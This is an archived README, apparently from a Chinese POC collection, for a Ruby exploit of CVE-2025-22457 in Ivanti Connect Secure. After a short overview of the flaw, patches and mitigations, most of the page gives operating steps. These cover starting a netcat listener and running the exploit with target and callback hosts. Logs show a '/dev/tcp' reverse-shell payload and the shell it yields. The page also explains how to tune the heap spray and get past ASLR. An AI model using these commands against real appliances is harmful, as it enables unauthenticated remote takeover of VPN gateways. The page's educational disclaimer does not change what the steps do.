关联漏洞
描述
CVE-2025-22457
介绍
# CVE-2025-22457: Critical Ivanti Connect Secure Vulnerability ⚡
### ⚠️ CVE-2025-22457 Overview
🛡️ **Type:** Critical stack-based buffer overflow
💻 **Affected Products:**
* Ivanti Connect Secure (≤ 22.7R2.5)
* Ivanti Policy Secure (≤ 22.7R1.3)
* Ivanti ZTA Gateways (≤ 22.8R2)
* Pulse Connect Secure (≤ 9.1R18.9, EoS)
🔥 **Impact:** Remote unauthenticated code execution
---
### 📅 Patch Release Dates
| 🛠️ Product | 📦 Fixed Version | 📆 Release Date |
| --------------------- | ---------------- | --------------- |
| Ivanti Connect Secure | 22.7R2.6 | Feb 2025 |
| Ivanti Policy Secure | 22.7R1.4 | April 21, 2025 |
| Ivanti ZTA Gateways | 22.8R2.2 | April 19, 2025 |
---
### 🚨 Exploitation in the Wild
* 🕵️♂️ Active since mid-March 2025
* 🎯 Targeted by espionage groups (suspected China-linked)
* 💀 Uses malware: TRAILBLAZE (dropper), BRUSHFIRE (backdoor), SPAWN malware ecosystem
---
### ✅ Mitigation Steps
1. ⬆️ **Update** affected systems immediately
2. 🔍 **Detect** compromises with Integrity Checker Tool (ICT)
3. 🕵️♀️ **Investigate** and isolate suspected systems
4. 🔑 **Reset** certificates, keys, and passwords
5. 📊 **Monitor** logs for unusual activity continuously
---
### 🚨 Usage:
We can run this script against a vulnerable Ivanti Connect Secure target, version 22.7r2.4 as follows:
Start a netcat listener to catch the reverse shell.
```
sudo ncat -lnvkp 8080
```
Run the exploit and brute force ASLR (This will be slow).
```
sudo ruby CVE-2025-22457.rb -t 192.168.86.111 -p 443 --lhost 192.168.86.35 --lport 8080
[2025-04-10 16:21:13 +0100] [+] Targeting https://192.168.86.111:443/
[2025-04-10 16:21:13 +0100] [+] Payload: bash -i >& /dev/tcp/192.168.86.35/8080 0>&1
[2025-04-10 16:21:13 +0100] [+] Detected version 22.7.2.3597
[2025-04-10 16:21:13 +0100] [+] Starting...
[2025-04-10 16:21:13 +0100] [+] Attempt 0, trying libdsplibs.so @ 0xf64ca000
[2025-04-10 16:21:13 +0100] Making connections...
[2025-04-10 16:21:18 +0100] Spraying...
[2025-04-10 16:22:27 +0100] Triggering..
```
When it works you will get a reverse shell.
```
sudo ncat -lnvkp 8080
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::8080
Ncat: Listening on 0.0.0.0:8080
Ncat: Connection from 192.168.86.111.
Ncat: Connection from 192.168.86.111:20746.
bash: cannot set terminal process group (-1): Inappropriate ioctl for device
bash: no job control in this shell
bash-4.2$ id
id
uid=104(nr) gid=104(nr) groups=104(nr)
bash-4.2$ uname -a
uname -a
Linux localhost2 4.17.00.35-selinux-jailing-production #1 SMP Tue Jun 18 16:25:33 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux
bash-4.2$
```
---
## 📡 Debug:
### Web Child Processes:
Depending on the underlying hardware, the number of CPUs available to the target appliance will dictate the number of child processes the /home/bin/web binary will spawn. As all incoming HTTPS requests will be distributed evenly between these children, we need to account for this and perform the heap spray enough times for all child processes. We need to do this as when we trigger the vulnerability, we cannot know what child process we will trigger it in. So we need the heap spray to be present in every child process.
+ 1 vCPU - 1 web process, no children
+ 2 vCPU - 1 web parent, 2 children
+ 4 vCPU - 1 web parent, 4 children (This is the default, and corresponds to the Ivanti Connect Secure ISA4000-V platform)
+ 8 vCPU - 1 web parent, 8 children (This corresponds to the Ivanti Connect Secure ISA6000-V platform)
For example, in a rooted vulnerable appliance, run the following to see the number of child /home/bin/web processes:
```
bash-4.2# ps -Al | grep web
ps -Al | grep web
4 S 104 3012 2394 0 80 0 - 26313 - ? 00:00:00 web
4 S 104 3013 2394 0 80 0 - 24931 - ? 00:00:00 web80
1 S 104 4947 3012 2 80 0 - 28209 - ? 00:01:27 web
1 S 104 5217 3012 1 80 0 - 31527 - ? 00:00:49 web
1 S 104 5695 3012 0 80 0 - 28199 - ? 00:00:00 web
1 S 104 5715 3012 0 80 0 - 28199 - ? 00:00:00 web
bash-4.2#
```
You can specify the expected number of web children via the --web_children argument, for example:
```
sudo ruby CVE-2025-22457.rb -t 192.168.86.111 -p 443 --lhost 192.168.86.35 --lport 8080 --web_children 4
```
### libdsplibs Base Address
If you are testing the PoC on a local system, you may want to avoid bruteforcing the libdsplibs base address. In this scenario, you can pass a known base address to the PoC via the --libdsplibs argument. For example, in a rooted vulnerable appliance, run the following:
```
bash-4.2# ps -A| grep web
ps -A| grep web
3200 ? 00:00:01 web80
20536 ? 00:00:02 web
bash-4.2# cat /proc/20536/maps | grep libdsplibs
cat /proc/20536/maps | grep libdsplibs
f642e000-f7994000 r-xp 00000000 fc:02 171879 /home/lib/libdsplibs.so
f7994000-f7995000 ---p 01566000 fc:02 171879 /home/lib/libdsplibs.so
f7995000-f79aa000 r--p 01566000 fc:02 171879 /home/lib/libdsplibs.so
f79aa000-f79e3000 rw-p 0157b000 fc:02 171879 /home/lib/libdsplibs.so
bash-4.2#
```
Then you can pass the know base address to the PoC as follows:
```
sudo ruby CVE-2025-22457.rb -t 192.168.86.111 -p 443 --lhost 192.168.86.35 --lport 8080 --web_children 4 --libdsplibs 0xf642e000
[2025-04-10 16:21:13 +0100] [+] Targeting https://192.168.86.111:443/
[2025-04-10 16:21:13 +0100] [+] Payload: bash -i >& /dev/tcp/192.168.86.35/8080 0>&1
[2025-04-10 16:21:13 +0100] [+] Detected version 22.7.2.3597
[2025-04-10 16:21:13 +0100] [+] Starting...
[2025-04-10 16:21:13 +0100] [+] Attempt 0, trying libdsplibs.so @ 0xf642e000
[2025-04-10 16:21:13 +0100] Making connections...
[2025-04-10 16:21:18 +0100] Spraying...
[2025-04-10 16:22:27 +0100] Triggering...
```
---
### ⚠️ Disclaimer:
The information provided here is for educational and awareness purposes only. Always follow your organization’s security policies and procedures when applying patches or performing security assessments. Unauthorized exploitation or scanning of systems without permission is illegal and unethical. Stay responsible and secure! 🛡️🔒
文件快照
[4.0K] /data/pocs/91a3ae739e3557c7d17273ee7eb551fd836d14cc
├── [9.9K] CVE-2025-22457.rb
└── [6.2K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。